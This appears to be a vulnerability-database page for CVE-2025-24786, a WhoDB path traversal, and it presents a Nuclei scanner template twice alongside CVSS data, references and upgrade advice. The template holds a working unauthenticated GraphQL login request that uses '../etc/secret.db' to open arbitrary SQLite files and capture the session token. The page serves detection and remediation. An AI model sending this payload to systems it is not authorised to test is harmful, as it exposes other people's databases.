WhoDB < 0.45.0 - Path Traversal

CVE-2025-24786

Verified

Description

WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.

Severity

High

CVSS Score

7.5

Exploit Probability

52%

Affected Product

whodb

Published Date

February 1, 2026

Template Author

basicbeny

CVE-2025-24786.yaml

id: CVE-2025-24786

info:
  name: WhoDB < 0.45.0 - Path Traversal
  author: basicbeny
  severity: high
  description: |
    WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.
  impact: |
    Attackers can access any Sqlite3 database on the system, potentially exposing sensitive data.
  remediation: |
    Upgrade to version 0.45.0 or later.
  reference:
    - https://github.com/clidey/whodb
    - https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-24786
    epss-score: 0.51816
    epss-percentile: 0.97942
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: clidey
    product: whodb
    fofa-query: body="whodb"
  tags: cve,cve2025,whodb,lfi,pathtraversal,unauth

http:
  - raw:
      - |
        POST /api/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}},"query":"mutation Login($credentials: LoginCredentials!) {\n  Login(credentials: $credentials) {\n    Status\n    __typename\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Status":true'
          - '"StatusResponse"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        name: token
        group: 1
        regex:
          - 'Token=([^;]+)'
# digest: 490a0046304402207962359d7fcb998a6c704df622280af29f8ce45ed732a0b2091bca565480c36e0220208ed431ca7f7cbb48c9b4bc4005aac88e783b66a52eae73ae5a28b7b670fa23:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-24786

CWE ID:

cwe-22

References

https://github.com/clidey/whodb https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76 https://nvd.nist.gov/vuln/detail/CVE-2025-24786

Remediation Steps

Upgrade to version 0.45.0 or later.

id: CVE-2025-24786

info:
  name: WhoDB < 0.45.0 - Path Traversal
  author: basicbeny
  severity: high
  description: |
    WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.
  impact: |
    Attackers can access any Sqlite3 database on the system, potentially exposing sensitive data.
  remediation: |
    Upgrade to version 0.45.0 or later.
  reference:
    - https://github.com/clidey/whodb
    - https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-24786
    epss-score: 0.51816
    epss-percentile: 0.97942
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: clidey
    product: whodb
    fofa-query: body="whodb"
  tags: cve,cve2025,whodb,lfi,pathtraversal,unauth

http:
  - raw:
      - |
        POST /api/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}},"query":"mutation Login($credentials: LoginCredentials!) {\n  Login(credentials: $credentials) {\n    Status\n    __typename\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Status":true'
          - '"StatusResponse"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        name: token
        group: 1
        regex:
          - 'Token=([^;]+)'
# digest: 490a0046304402207962359d7fcb998a6c704df622280af29f8ce45ed732a0b2091bca565480c36e0220208ed431ca7f7cbb48c9b4bc4005aac88e783b66a52eae73ae5a28b7b670fa23:922c64590222798bb761d5b6d8e72950

WhoDB < 0.45.0 - Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WhoDB < 0.45.0 - Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps